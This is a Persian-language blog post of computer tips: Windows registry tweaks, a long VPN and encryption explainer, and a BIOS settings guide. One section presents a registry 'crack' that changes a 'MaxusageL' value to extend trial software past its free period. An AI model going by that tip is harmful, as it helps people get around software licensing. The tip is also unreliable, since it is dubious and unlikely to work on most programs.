Nevise web Jadid

 امید مینویسد:

اینها اطلاعاتی درباره ی سیستم عامل های لینوکس و ویندوز

است - و البته مقداری مطالب دیگر ... .                 

 

     !! به اوابل متن توجه نکنید به آخر و وسطای متن بروید !!

                     

                           بــــــــــه نــــــام آزادی 

                               به نام حق و عدالت

                                     به نام خدا

 

پیغامی قبل از ورود به ویدوز

با استفاده ازاین ترفند می توانید کاری کنید که پیش از بالا آمدن کامل ویندوز و قبل از نمایش Welcome متنی را قرار دهید که این قابلیت را دارد که فارسی باشد و در یک پنجره کوچک نمایش داده شود. به عنوان مثال خوش آمدگویی به کاربر باشد یا در صورتی که در یک کافی نت مشغول کار باشید قوانین آن مکان را نمایش دهد

بدین منظور در
Run تایپ کنید regedit تا رجیستری باز شود.
سپس یه کلید مقابل بروید: [
HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersion / Winlogon]
و دو مقدار رشته ای به نامهای
LegalNoticeCaption وLegalNoticeText بسازید.
در
LegalNoticeCaption نام کادر پیغام و به LegalNoticeText متنی که دوست دارید نمایش داده شود را بنویسید

منبع:forum.p30world.com

 

رجیستر کردن برنامه ها توسط رجیستری ویندوز

ممکن است شما نیز برنامه هایی را بر روی سیستم تان نصب کرده باشید که پس از مدتی ، زمان استفاده رایگان از آنها پایان میبابد. بنابراین باید اینترنت را برای یافتن کرک آن زیر و رو کنید. اما اکنون قصد داریم ترفندی را به شما معرفی کنیم که با استفاده از آن میتوانید این برنامه ها را از طریق رجیستری ویندوز کرک کنید.

از منوی
Start وارد محیط Run شوید و در آن عبارت regedit
را تایپ کنید تا ویرایشگر رجیستری باز شود.
حال وارد
HKEY_CURRENT_USER / Software شوید و به دنبال نام برنامه مورد نظر بگردید و روی آن دوبار کلیک کنید.
حال از قسمت دیگر ، بر روی
MaxusageL دوبار کلیک کرده و در پنجره باز شده مقدار Value آن را به 1 تغییر دهید.

در پایان دقت کنید که:
* این ترفند ممکن است بر روی برنامه های خاصی جواب ندهد.
* در صورت عدم وجود
Maxusage خودتان آن را ایجاد کنید.
* این ترفند مخصوص برنامه های مدت دار است نه آنهایی که حتما برای استفاده نیاز به کرک داشته باشند.

منبع:forum.p30world.com

 

پسوند های ناشناخته

برای اینکه هنگامی که می خواهید یک فایل ناشناخته را در ویندوز xp باز کنید و مستقیما به لیست برنامه ها بروید و از شما سوال نشود .رجیستری را باز وبه مسیر زیر بروید .
HKEY-CURRENT-USER/Software/Microsoft/windows/CurrentVersion/Explorer
سپس یک مقدار جدید
Dword به نام Internetopenwith ایجاد و مقدار آن را صفر قرار دهید . به این ترتیب هنگام اجرای یک فایل ناشناخته مستقیما به لیست برنامه ها خواهید رفت.

 

تغییر مسیر فولدرهای خاص

با استفاده از رجیستری می توانید مسیر بعضی از فولدرهای خاص در ویندوز نظیر My Documents,My Pictures,… را تغییر دهید . برای این کار در منوی Run برنامه Regedit را اجرا کنید و به مسیر زیر بروید .
HKEY-CURRENT-USER/Software/Microsoft/Windows/Current version/Explorer/Usershellfolders
بر روی هر مسیری که میخواهید تغییر دهید دو بار کلیک کنید و مسیر دلخواه خود را وارد کنید. برای اعمال تغییرات یا
Logoff کنید و یا اینکه سیتم را Restart نمایید .

منبع:forum.p30world.com

 

فعال کردن Administrator در صفحه ورود

برای اینکه کاربر Administrator در صفحه اولیه ورود به ویندوز xp نمایش داده شود رجیستری را اجرا کنید و به مسیر زیر بروید .
HKEY-LOCAL-MACHINE/Software/Microsoft/WindowsNT/CurrentVersion/WinLogon/SpecialAccounts/UserList
سپس در قسمت سمت راست کلیک راست کنید و یک مقدار
DWORD جدید بسازید .
نام آن را همانند نام کابری که می خواهید نشان داده شود (
Administrator) بگذارید.

 

دو نوع عمده شبکه های VPN وجود دارد


● دستیابی از راه دور (Remote-Access) . به این نوع از شبکه ها VPDN)Virtual private dial-up network)، نیز گفته می شود.در شبکه های فوق از مدل ارتباطی User-To-Lan ( ارتباط کاربر به یک شبکه محلی ) استفاده می گردد. سازمانهائی که از مدل فوق استفاده می نمایند ، بدنبال ایجاد تسهیلات لازم برای ارتباط پرسنل ( عموما" کاربران از راه دور و در هر مکانی می توانند حضور داشته باشند ) به شبکه سازمان می باشند. سازمانهائی که تمایل به برپاسازی یک شبکه بزرگ " دستیابی از راه دور " می باشند ، می بایست از امکانات یک مرکز ارائه دهنده خدمات اینترنت جهانی ESP)Enterprise service provider) استفاده نمایند. سرویس دهنده ESP ، بمنظور نصب و پیکربندی VPN ، یک NAS)Network access server) را پیکربندی و نرم افزاری را در اختیار کاربران از راه دور بمنظور ارتباط با سایت قرار خواهد داد. کاربران در ادامه با برقراری ارتباط قادر به دستیابی به NAS و استفاده از نرم افزار مربوطه بمنظور دستیابی به شبکه سازمان خود خواهند بود.

● سایت به سایت (
Site-to-Site) . در مدل فوق یک سازمان با توجه به سیاست های موجود ، قادر به اتصال چندین سایت ثابت از طریق یک شبکه عمومی نظیر اینترنت است . شبکه های VPN که از روش فوق استفاده می نمایند ، دارای گونه های خاصی در این زمینه می باشند:

▪ مبتنی بر اینترانت . در صورتیکه سازمانی دارای یک و یا بیش از یک محل ( راه دور) بوده و تمایل به الحاق آنها در یک شبکه اختصاصی باشد ، می توان یک اینترانت
VPN را بمنظور برقرای ارتباط هر یک از شبکه های محلی با یکدیگر ایجاد نمود.

 


▪ مبتنی بر اکسترانت . در مواردیکه سازمانی در تعامل اطلاعاتی بسیار نزدیک با سازمان دیگر باشد ، می توان یک اکسترانت VPN را بمنظور ارتباط شبکه های محلی هر یک از سازمانها ایجاد کرد. در چنین حالتی سازمانهای متعدد قادر به فعالیت در یک محیط اشتراکی خواهند بود.

استفاده از
VPN برای یک سازمان دارای مزایای متعددی نظیر : گسترش محدوه جغرافیائی ارتباطی ، بهبود وضعیت امنیت ، کاهش هزینه های عملیاتی در مقایسه با روش های سنتی WAN ، کاهش زمان ارسال و حمل اطلاعات برای کاربران از راه دور ، بهبود بهره وری ، توپولوژی آسان ،... است . در یکه شبکه VPN به عوامل متفاوتی نظیر : امنیت ، اعتمادپذیری ، مدیریت شبکه و سیاست ها نیاز خواهد بود.

شبکه های
LAN جزایر اطلاعاتی

فرض نمائید در جزیره ای در اقیانوسی بزرگ ، زندگی می کنید. هزاران جزیره در اطراف جزیره شما وجود دارد. برخی از جزایر نزدیک و برخی دیگر دارای مسافت طولانی با جزیره شما می باشند. متداولترین روش بمنظور مسافرت به جزیره دیگر ، استفاده از یک کشتی مسافربری است . مسافرت با کشتی مسافربری ، بمنزله عدم وجود امنیت است . در این راستا هر کاری را که شما انجام دهید ، توسط سایر مسافرین قابل مشاهده خواهد بود. فرض کنید هر یک از جزایر مورد نظر به مشابه یک شبکه محلی (
LAN) و اقیانوس مانند اینترنت باشند. مسافرت با یک کشتی مسافربری مشابه برقراری ارتباط با یک سرویس دهنده وب و یا سایر دستگاههای موجود در اینترنت است . شما دارای هیچگونه کنترلی بر روی کابل ها و روترهای موجود در اینترنت نمی باشید. ( مشابه عدم کنترل شما بعنوان مسافر کشتی مسافربری بر روی سایر مسافرین حاضر در کشتی ) .در صورتیکه تمایل به ارتباط بین دو شبکه اختصاصی از طریق منابع عمومی وجود داشته باشد ، اولین مسئله ای که با چالش های جدی برخورد خواهد کرد ، امنیت خواهد بود. فرض کنید ، جزیره شما قصد ایجاد یک پل ارتباطی با جزیره مورد نظر را داشته باشد .مسیر ایجاد شده یک روش ایمن ، ساده و مستقیم برای مسافرت ساکنین جزیره شما به جزیره دیگر را فراهم می آورد. همانطور که حدس زده اید ، ایجاد و نگهداری یک پل ارتباطی بین دو جزیره مستلزم صرف هزینه های بالائی خواهد بود.( حتی اگر جزایر در مجاورت یکدیگر باشند ) . با توجه به ضرورت و حساسیت مربوط به داشتن یک مسیر ایمن و مطمئن ، تصمیم به ایجاد پل ارتباطی بین دو جزیره گرفته شده است . در صورتیکه جزیره شما قصد ایجاد یک پل ارتباطی با جزیره دیگر را داشته باشد که در مسافت بسیار طولانی نسبت به جزیره شما واقع است ، هزینه های مربوط بمراتب بیشتر خواهد بود. وضعیت فوق ، نظیر استفاده از یک اختصاصی Leased است . ماهیت پل های ارتباطی ( خطوط اختصاصی ) از اقیانوس ( اینترنت ) متفاوت بوده و کماکن قادر به ارتباط جزایر( شبکه های LAN) خواهند بود. سازمانها و موسسات متعددی از رویکرد فوق ( استفاده از خطوط اختصاصی) استفاده می نمایند. مهمترین عامل در این زمینه وجود امنیت و اطمینان برای برقراری ارتباط هر یک سازمانهای مورد نظر با یکدیگر است . در صورتیکه مسافت ادارات و یا شعب یک سازمان از یکدیگر بسیار دور باشد ، هزینه مربوط به برقرای ارتباط نیز افزایش خواهد یافت .

با توجه به موارد گفته شده ، چه ضرورتی بمنظور استفاده از
VPN وجود داشته و VPN تامین کننده ، کدامیک از اهداف و خواسته های مورد نظر است ؟ با توجه به مقایسه انجام شده در مثال فرضی ، می توان گفت که با استفاده از VPN به هریک از ساکنین جزیره یک زیردریائی داده می شود. زیردریائی فوق دارای خصایص متفاوت نظیر :

دارای سرعت بالا است .

هدایت آن ساده است .

قادر به استتار( مخفی نمودن) شما از سایر زیردریا ئیها و کشتی ها است .

قابل اعتماد است .

پس از تامین اولین زیردریائی ، افزودن امکانات جانبی و حتی یک زیردریائی دیگرمقرون به صرفه خواهد بود

در مدل فوق ، با وجود ترافیک در اقیانوس ، هر یک از ساکنین دو جزیره قادر به تردد در طول مسیر در زمان دلخواه خود با رعایت مسایل ایمنی می باشند. مثال فوق دقیقا" بیانگر تحوه عملکرد
VPN است . هر یک از کاربران از راه دور شبکه قادربه برقراری ارتباطی امن و مطمئن با استفاده از یک محیط انتقال عمومی ( نظیر اینترنت ) با شبکه محلی (LAN) موجود در سازمان خود خواهند بود. توسعه یک VPN ( افزایش تعداد کاربران از راه دور و یا افزایش مکان های مورد نظر ) بمراتب آسانتر از شبکه هائی است که از خطوط اختصاصی استفاده می نمایند. قابلیت توسعه فراگیر از مهمتزین ویژگی های یک VPN نسبت به خطوط اختصاصی است .

امنیت
VPN

شبکه های
VPN بمنظور تامین امنیت (داده ها و ارتباطات) از روش های متعددی استفاده می نمایند :

● فایروال . فایروال یک دیواره مجازی بین شبکه اختصای یک سازمان و اینترنت ایجاد می نماید. با استفاده از فایروال می توان عملیات متفاوتی را در جهت اعمال سیاست های امنیتی یک سازمان انجام داد. ایجاد محدودیت در تعداد پورت ها فعال ، ایجاد محدودیت در رابطه به پروتکل های خاص ، ایجاد محدودیت در نوع بسته های اطلاعاتی و ... نمونه هائی از عملیاتی است که می توان با استفاده از یک فایروال انجام داد.

● رمزنگاری . فرآیندی است که با استفاده از آن کامپیوتر مبداء اطلاعاتی رمزشده را برای کامپیوتر دیگر ارسال می نماید. سایر کامپیوترها ی مجاز قادر به رمزگشائی اطلاعات ارسالی خواهند بود. بدین ترتیب پس از ارسال اطلاعات توسط فرستنده ، دریافت کنندگان، قبل از استفاده از اطلاعات می بایست اقدام به رمزگشائی اطلاعات ارسال شده نمایند. سیستم های رمزنگاری در کامپیوتر به دو گروه عمده تقسیم می گردد :

رمزنگاری کلید متقارن

رمزنگاری کلید عمومی

در رمز نگاری " کلید متقارن " هر یک از کامپیوترها دارای یک کلید
Secret ( کد ) بوده که با استفاده از آن قادر به رمزنگاری یک بسته اطلاعاتی قبل از ارسال در شبکه برای کامپیوتر دیگر می باشند. در روش فوق می بایست در ابتدا نسبت به کامپیوترهائی که قصد برقراری و ارسال اطلاعات برای یکدیگر را دارند ، آگاهی کامل وجود داشته باشد. هر یک از کامپیوترهای شرکت کننده در مبادله اطلاعاتی می بایست دارای کلید رمز مشابه بمنظور رمزگشائی اطلاعات باشند. بمنظور رمزنگاری اطلاعات ارسالی نیز از کلید فوق استفاده خواهد شد. فرض کنید قصد ارسال یک پیام رمز شده برای یکی از دوستان خود را داشته باشید. بدین منظور از یک الگوریتم خاص برای رمزنگاری استفاده می شود .در الگوریتم فوق هر حرف به دوحرف بعد از خود تبدیل می گردد.(حرف A به حرف C ، حرف B به حرف D ) .پس از رمزنمودن پیام و ارسال آن ، می بایست دریافت کننده پیام به این حقیقت واقف باشد که برای رمزگشائی پیام لرسال شده ، هر حرف به دو حرق قبل از خود می باطست تبدیل گردد. در چنین حالتی می باطست به دوست امین خود ، واقعیت فوق ( کلید رمز ) گفته شود. در صورتیکه پیام فوق توسط افراد دیگری دریافت گردد ، بدلیل عدم آگاهی از کلید ، آنان قادر به رمزگشائی و استفاده از پیام ارسال شده نخواهند بود.

در رمزنگاری عمومی از ترکیب یک کلید خصوصی و یک کلید عمومی استفاده می شود. کلید خصوصی صرفا" برای کامپیوتر شما ( ارسال کننده) قابل شناسائی و استفاده است . کلید عمومی توسط کامپیوتر شما در اختیار تمام کامپیوترهای دیگر که قصد ارتباط با آن را داشته باشند ، گذاشته می شود. بمنظور رمزگشائی یک پیام رمز شده ، یک کامپیوتر می بایست با استفاده از کلید عمومی ( ارائه شده توسط کامپیوتر ارسال کننده ) ، کلید خصوصی مربوط به خود اقدام به رمزگشائی پیام ارسالی نماید . یکی از متداولترین ابزار "رمزنگاری کلید عمومی" ، روشی با نام
PGP)Pretty Good Privacy) است . با استفاده از روش فوق می توان اقدام به رمزنگاری اطلاعات دلخواه خود نمود.

IPSec . پروتکل IPsec)Internet protocol security protocol) ، یکی از امکانات موجود برای ایجاد امنیت در ارسال و دریافت اطلاعات می باشد . قابلیت روش فوق در مقایسه با الگوریتم های رمزنگاری بمراتب بیشتر است . پروتکل فوق دارای دو روش رمزنگاری است : Tunnel ، Transport . در روش tunel ، هدر و Payload رمز شده درحالیکه در روش transport صرفا" payload رمز می گردد. پروتکل فوق قادر به رمزنگاری اطلاعات بین دستگاههای متفاوت است :

روتر به روتر

فایروال به روتر

کامپیوتر به روتر

کامپیوتر به سرویس دهنده

● سرویس دهنده
AAA . سرویس دهندگان( AAA : Authentication ,Authorization,Accounting) بمنظور ایجاد امنیت بالا در محیط های VPN از نوع " دستیابی از راه دور " استفاده می گردند. زمانیکه کاربران با استفاده از خط تلفن به سیستم متصل می گردند ، سرویس دهنده AAA درخواست آنها را اخذ و عمایات زیر را انجام خواهد داد :

شما چه کسی هستید؟ ( تایید ،
Authentication )

شما مجاز به انجام چه کاری هستید؟ ( مجوز ،
Authorization )

چه کارهائی را انجام داده اید؟ ( حسابداری ،
Accounting )

تکنولوژی های
VPN

با توجه به نوع
VPN ( " دستیابی از راه دور " و یا " سایت به سایت " ) ، بمنظور ایجاد شبکه از عناصر خاصی استفاده می گردد:

نرم افزارهای مربوط به کاربران از راه دور

سخت افزارهای اختصاصی نظیر یک " کانکتور
VPN" و یا یک فایروال PIX

سرویس دهنده اختصاصی
VPN بمنظور سرویُس های Dial-up

سرویس دهنده
NAS که توسط مرکز ارائه خدمات اینترنت بمنظور دستیابی به VPN از نوع "دستیابی از را دور" استفاده می شود.

شبکه
VPN و مرکز مدیریت سیاست ها

با توجه به اینکه تاکنون یک استاندارد قابل قبول و عمومی بمنظور ایجاد ش
VPN ایجاد نشده است ، شرکت های متعدد هر یک اقدام به تولید محصولات اختصاصی خود نموده اند.

- کانکتور
VPN . سخت افزار فوق توسط شرکت سیسکو طراحی و عرضه شده است. کانکتور فوق در مدل های متفاوت و قابلیت های گوناگون عرضه شده است . در برخی از نمونه های دستگاه فوق امکان فعالیت همزمان 100 کاربر از راه دور و در برخی نمونه های دیگر تا 10.000 کاربر از راه دور قادر به اتصال به شبکه خواهند بود.

- روتر مختص
VPN . روتر فوق توسط شرکت سیسکو ارائه شده است . این روتر دارای قابلیت های متعدد بمنظور استفاده در محیط های گوناگون است . در طراحی روتر فوق شبکه های VPN نیز مورد توجه قرار گرفته و امکانات مربوط در آن بگونه ای بهینه سازی شده اند.

- فایروال
PIX . فایروال PIX(Private Internet eXchange) قابلیت هائی نظیر NAT ، سرویس دهنده Proxy ، فیلتر نمودن بسته ای اطلاعاتی ، فایروال و VPN را در یک سخت افزار فراهم نموده است .

Tunneling( تونل سازی )

اکثر شبکه های
VPN بمنظور ایجاد یک شبکه اختصاصی با قابلیت دستیابی از طریق اینترنت از امکان " Tunneling " استفاده می نمایند. در روش فوق تمام بسته اطلاعاتی در یک بسته دیگر قرار گرفته و از طریق شبکه ارسال خواهد شد. پروتکل مربوط به بسته اطلاعاتی خارجی ( پوسته ) توسط شبکه و دو نفطه (ورود و خروج بسته اطلاعاتی ) قابل فهم می باشد. دو نقظه فوق را "اینترفیس های تونل " می گویند. روش فوق مستلزم استفاده از سه پروتکل است :

پروتکل حمل کننده . از پروتکل فوق شبکه حامل اطلاعات استفاده می نماید.

پروتکل کپسوله سازی . از پروتکل هائی نظیر:
IPSec,L2F,PPTP,L2TP,GRE استفاده می گردد.

پروتکل مسافر . از پروتکل هائی نظیر
IPX,IP,NetBeui بمنظور انتقال داده های اولیه استفاده می شود.

با استفاده از روش
Tunneling می توان عملیات جالبی را انجام داد. مثلا" می توان از بسته ای اطلاعاتی که پروتکل اینترنت را حمایت نمی کند ( نظیر NetBeui) درون یک بسته اطلاعاتی IP استفاده و آن را از طریق اینترنت ارسال نمود و یا می توان یک بسته اطلاعاتی را که از یک آدرس IP غیر قابل روت ( اختصاصی ) استفاده می نماید ، درون یک بسته اطلاعاتی که از آدرس های معتبر IP استفاده می کند ، مستقر و از طریق اینترنت ارسال نمود.

در شبکه های
VPN از نوع " سایت به سایت " ، GRE)generic routing encapsulation) بعنوان پروتکل کپسوله سازی استفاده می گردد. فرآیند فوق نحوه استقرار و بسته بندی " پروتکل مسافر" از طریق پروتکل " حمل کننده " برای انتقال را تبین می نماید. ( پروتکل حمل کننده ، عموما" IP است ) . فرآیند فوق شامل اطلاعاتی در رابطه با نوع بست های اطلاعاتی برای کپسوله نمودن و اطلاعاتی در رابطه با ارتباط بین سرویس گیرنده و سرویس دهنده است . در برخی موارد از پروتکل IPSec ( در حالت tunnel) برای کپسوله سازی استفاده می گردد.پروتکل IPSec ، قابل استفاده در دو نوع شبکه VPN ( سایت به یایت و دستیابی از راه دور ) است . اینترفیش های Tunnel می بایست دارای امکانات حمایتی از IPSec باشند.

در شبکه های
VPN از نوع " دستیابی از راه دور " ، Tunneling با استفاده از PPP انجام می گیرد. PPP بعنوان حمل کننده سایر پروتکل های IP در زمان برقراری ارتباط بین یک سیستم میزبان و یک سیستم ازه دور ، مورد استفاده قرار می گیرد.

هر یک از پروتکل های زیر با استفاده از ساختار اولیه
PPP ایجاد و توسط شبکه های VPN از نوع " دستیابی از راه دور " استفاده می گردند:

-
L2F)Layer 2 Forwarding) . پروتکل فوق توسط سیسکو ایجاد شده است . در پروتکل فوق از مدل های تعیین اعتبار کاربر که توسط PPP حمایت شده اند ، استفاده شد ه است .

PPTP)Point-to-Point Tunneling Protocol) . پروتکل فوق توسط کنسرسیومی متشکل از شرکت های متفاوت ایجاد شده است . این پروتکل امکان رمزنگاری 40 بیتی و 128 بیتی را دارا بوده و از مدل های تعیین اعتبار کاربر که توسط PPP حمایت شده اند ، استفاده می نماید.

-
L2TP)Layer 2 Tunneling Protocol) . پروتکل فوق با همکاری چندین شرکت ایجاد شده است .پروتکل فوق از ویژگی های PPTP و L2F استفاده کرده است . پروتکل L2TP بصورت کامل IPSec را حمایت می کند. از پروتکل فوق بمنظور ایجاد تونل بین موارد زیر استفاده می گردد :

سرویس گیرنده و روتر

NAS و روتر

روتر و روتر

عملکرد
Tunneling مشابه حمل یک کامپیوتر توسط یک کامیون است . فروشنده ، پس از بسته بندی کامپیوتر ( پروتکل مسافر ) درون یک جعبه ( پروتکل کپسوله سازی ) آن را توسط یک کامیون ( پروتکل حمل کننده ) از انبار خود ( ایترفیس ورودی تونل ) برای متقاضی ارسال می دارد. کامیون ( پروتکل حمل کننده ) از طریق بزرگراه ( اینترنت ) مسیر خود را طی ، تا به منزل شما ( اینترفیش خروجی تونل ) برسد. شما در منزل جعبه ( پروتکل کپسول سازی ) را باز و کامپیوتر ( پروتکل مسافر) را از آن خارج می نمائید.

منبع:esmaili.blogsky.com

آموزش تنظیمات بایوس سیستم BIOS Setup

در این بخش که فقط با کیبورد قابل تنظیم است میتوانید تنظیمات بسیار زیادی انجام دهید که به مهمترین آنها اشاره می شود .  Bios مخفف کلمه Base Input Output System میباشد و شامل امکاناتی جهت تنظیم و پیکربندی تنظیمات و امکانات سیستم میباشد .
تنظیمات بایوس یا سیماس
Cmos در آی سی موسوم به آی سی سیماس بر روی مادِربورد ذخیره می شود .
هنگامی که کامپیوتر خاموش است ، باطری تعبیه شده بر روی مادِر بورد تنظیمات ذخیره شده را نگهداری می کند . علاوه بر تنظیمات ، ساعت و تاریخ نیز اطلاعات آی¬سیِ سیماس است که توسط این باطری محافظت می شود
برای ورود به بخش تنظیمات بایوس بایستی هنگامی که کامپیوتر را روشن می کنیم دکمه های
Delete ویا در بعضی سیستمها Ctl+F۱ و یا F۱۲ را بزنیم .( بستگی به نوع مادِربورد دارد ) .
در این بخش که فقط با کیبورد قابل تنظیم است میتوانید تنظیمات بسیار زیادی انجام دهید که به مهمترین آنها اشاره می شود .
توجه کنید که منو بندی و گزینه ها ممکن است در مادِربوردهای مختلف متفاوت باشد اما اصول کلی و مفهوم تمام انها یکی است که ما به گزینه های اصلی مربوط به دو سازنده معروف آیسی بایوس (
AMI و Award
) پرداخته ایم :
۱) Standard CMOS Features
۱) قابلیتهای استاندارد
این بخش شامل تنظیمات اصلی و مشترک بین تمام سیستمها میباشد و شامل موارد زیر است :
Date & Time
:
تنظیم و نمایش تاریخ - تنظیم و نمایش ساعت
IDE ۰ Master :
تنظیم و نمایش دستگاهی که به پورت
IDE۰ روی مادر بورد نصب شده و در حالت Master قرار دارد
IDE ۰ Slave :
تنظیم و نمایش دستگاهی که به پورت
IDE۰ روی مادر بورد نصب شده و در حالت Slave قرار دارد
IDE ۱ Master :
تنظیم و نمایش دستگاهی که به پورت
IDE۱ روی مادر بورد نصب شده و در حالت Master قرار دارد
IDE ۱ Slave :
تنظیم و نمایش دستگاهی که به پورت
IDE۱ روی مادر بورد نصب شده و در حالت Slave قرار دارد
Serial ATA ۰ :
تنظیم و نمایش دستگاهی که به پورت
SATA۰
روی مادر بورد نصب شده .
Serial ATA ۱ :

تنظیم و نمایش دستگاهی که به پورت
SATA۱ روی مادر بورد نصب شده .
Floppy Device [Drive A / Drive B
] :
تنظیمات و فعال/غیرفعال کردن درایو فلاپی دیسک
System Information :
نمایش کلیاتی راجع به سیستم (در برخی سیستمها وجود دارد )
ـ نکته: دستگاههایی مانند سی¬دی¬رام ، رایتر و هارد اغلب
ATA هستند و با کابلی ۸۰ رشته ای موسوم به IDE که مطابق شکل زیر است به مادربورد وصل می شود . اغلب مادربوردها دارای یک یا دو پورت IDE هستند( یعنی ۲ یا ۴ دستگاه ATA را میتوان به آن وصل کرد. به ATA در مواقعی PATA نیز گویند ).

 

از آنجا که کابل IDE دارای سوکت میباشد دو سوکت آن به دو دستگاه قابل نصب است که یکی Slave و دیگری Master خواهد بود . برای تنظیم اینکه کدامیک Master و کدامیک Salve باشند در پشت این دستگاهها جامپرهایی مطابق شکل زیر تعبیه شده که با توجه به توضیحات روی دستگاه قابل تنظیم هستند .
هاردها و رایترها با سوکت
SATA نیز موجودند که سرعت بسیار بیشتری دارند و کابل آنها کوچکتر میباشد . این دستگاهها با کابل موسوم به ساتا به مادربورد وصل می شوند . به هر پورت ساتا یک وسیله نصب میشود . در حال حاضر اغلب مادربوردها دارای ۲ ، ۴ و یا ۶ پورت ساتا هستند .
هاردها و رایترها با سوکت
SATA نیز موجودند که سرعت بسیار بیشتری دارند و کابل آنها کوچکتر میباشد . این دستگاهها با کابل موسوم به ساتا به مادربورد وصل می شوند . به هر پورت ساتا یک وسیله نصب میشود . در حال حاضر اغلب مادربوردها دارای ۲ ، ۴ و یا ۶
پورت ساتا هستند .
۲)Advanced CMOS Features

۲) امکانات ویژه و خاص
شامل تنظیمات امکانات ویژه و خاص مربوط به
BIOS
سیستم میباشد .
مثلا در اغلب بایوس ها شامل موارد زیر است :
( توضیح: گزینه های قابل انتخاب برای هر تنظیم در داخل کروشه[ ] قرار داده شده )
Boot Sector Protection : [ Enable/ Disable ]
فعال(
Enable) یا غیرفعال (Disable) بودن سیستم حفاظت از خرابی و دستکاری غیرمجاز بایوس توسط ویروس و یا اتفاقات ناخواسته
Full Screen Logo Screen : [ Enable/ Disable ]
نمایش یا عدم نمایش لوگوی شرکت سازنده مادِربورد در ابتدای روشن شدن سیستم
Quick Booting : [ Enable/ Disable ]
با قرار دادن این گزینه در حالت فعال (
Enable) ، سیستم پس از گذشت ۱۰ ثانیه از چک کردن تنظیمات شروع به بالا آمدن میکند . (اگر چک قعات بیش از ۱۰ ثانیه طول بکشد از چک کردن مابقی صرفنظر می کند )
Boot Up Num-Lock LED : [ON / OFF
]
مشخص کردن وضعیت پیش فرض چراغ دکمه های شماره (
Numbers Keys)
Boot Sequence [C, CD-Rom,A / A,CD-Rom,C / CD-Rom.C,A / CD- Rom,A,C ]
با ورود به این بخش می توانید اولویت مراجعه سیستم برای بالا آمدن را به دستگاه دلخواه بدهید .
Hard Disk Boot Priority : [ HDD ۰ / HDD ۱ / HDD ۲ /… ]
تنظیم اولویت بین هارددیسکها برای بالا آمدن (اینکه سیستم عامل با کمک کدام هارد بالا بیاید)
First(۱st) Boot Device : [ Hard Disk / CD-ROM / Floppy / USB HDD
/… ]
تنظیم اولین دستگاهی که توسط سیستم برای بوت شدن مورد استفاده قرار میگیرد
Second(۲nd) Boot Device : [ Hard Disk / CD-ROM / Floppy / USB HDD/… ]
تنظیم دومین دستگاهی که توسط سیستم برای بوت شدن مورد استفاده قرار میگیرد .( به دستگاه دوم تنها زمانی مراجعه می شود که دستگاه اول نتوانسته سیستم را بوت کند )
Third(۳rd) Boot Device : [ Hard Disk / CD-ROM / Floppy / USB HDD/…
]
تنظیم سومین دستگاهی که توسط سیستم برای بوت شدن مورد استفاده قرار میگیرد .( به دستگاه سوم تنها زمانی مراجعه می شود که دستگاه دوم نتوانسته سیستم را بوت کند )
Other Boot Device

تنظیم دیگر دستگاهها که توسط سیستم برای بوت شدن مورد استفاده قرار میگیرند.
ـ نکته : هنگامی که میخواهیم از روی سی دی ویندوز نصب کنیم بایستی
First Boot Device را CD-ROM قرار دهیم تا سیستم به محض روشن شدن به درایو سی دی مراجعه کرده و از روی سی دی بالا بیاید .
برای نصب سیستم عامل داس بایستی
First Boot Device را Floppy Disc قرار دهیم تا سیستم به محض روشن شدن به درایو فلاپی مراجعه کرده و از روی فلاپی بالا بیاید .
۳) Integrated Peripherals
۳) دستگاههای مجتمع روی مادِربورد
تنظیمات مربوط به تمامی دستگاهها و قطعات روی مادِربورد ( مجتمع شده بر روی مادِربورد) یا اصطلاحا تنظیمات دستگاههای آنبورد (
On Board

دستگاههای آنبورد مانند سیستم کارت صوت مادربورد و یا پورتهای
USB (یو اِس بی) و (همچنین در بعضی از مادربوردها تنظیمات کارت گرافیکهای تعبیه شده روی مادِربورد ) و نیز تنظیمات مربوط به کارت شبکه تعبیه شده بر روی مادِربورد .
به توضیح بخشهای مهم این قسمت میپردازیم :
USB Controller : [Disable / ۲ Ports / ۴ Ports / ۶ Ports / ۸ Ports /… ]
تنظیم فعال یا غیر فعال بودن پورتهای
USB مادِربورد
USB Device Legacy Support : [Enable / Disable ]
تنظیم امکان/عدم امکان استفاده از دستگاههای
USB در سیستم عامل
Onboard Lan Controller : [Enable / Disable ]
تنظیم فعال/غیرفعال بودن کنترلر شبکه
Audio Controller : [Enable / Disable ]
تنظیم فعال/غیرفعال بودن کارت صوت مجتمع شده
On-Chip ATA Controller : [Enable / Disable ]
تنظیم کنترلر دستگاههای اِتا (
ATA)
On-Chip SATA Controller : [Enable / Disable ]
تنظیم فعال/غیرفعال بودن کنترلر دستگاههای
SATA
Raid Sata Mode : [IDE / Raid۰ / Raid ۱ / Raid ۲ / …]
تنظیم سیستم استفاده از
Raid ( استفاده بهینه و بدون خطا از چند هارددیسک)
I/O Device :
تنظیمات مربوط به پورتهای خروجی و ورودی مادِربورد مانند
LPT, Com,Mid
USB Keyboard Support : [Enable / Disable ]
فعال یا غیرفعال بودن کیبورد با پورت
USB ( برای کیبورد های یو اس بی حتما بایداین گزینه فعال باشد )
USB Mouse Support : [Enable / Disable ]
فعال یا غیرفعال بودن ماوس با پورت
USB ( برای موس های یو اس بی حتما باید این پورت فعال باشد ، در غیر اینصورت هنگام نصب ویندوز در زمانی که سیستم یو اس بی را شناسایی نمی کند موس غیر فعال می شود )
Onboard Serial Port ۱ & ۲
تنظیمات مربوط به پورتهای سریال
۴) Power Management Setup
۴) تنظیمات مدیریت تغذیه سیستم
در این قسمت اغلب چند بخش اساسی وجود دارد :
ACPI Function(Or Suspend Mode) : [Enable / Disable
]
تنظیم عملکرد حالت
ACPI که در ویندوز ۲۰۰۰ و اکس پی قابل استفاده است )
USB Device Wake UP : [Enable / Disable
]
اینکه سیستم با دستگاههای متصل به
USB از حالت استندبای خارج گردد یا خیر
Resume From S۳ By PS۲ Keyboard: [Enable / Disable ]
اینکه سیستم با کیبورد متصل به
PS۲ از حالت استندبای خارج گردد یا خیر
Resume From S۳ By PS۲ Mouse : [Enable / Disable
]
اینکه سیستم با ماوس متصل به
PS۲ از حالت استندبای خارج گردد یا خیر
Power Button Function : [Power Off / Suspend
]
عملکرد دکمه پاور روی کِیس ( خاموش کند و یا به حالت استندبای برود )
Keyboard Power ON :
این بخش دارای
۳ گزینه است :
ـ
Password
: با زدن پسووردی دلخواه سیستم روشن شود
ـ
Disable : حالت روشن شدن سیستم با صفحه کلید غیرفعال باشد
ـ
Keyboard ۹۸ : با زدن دکمه پاور روی کیبوردهای قدیمی سیستم روشن شود .
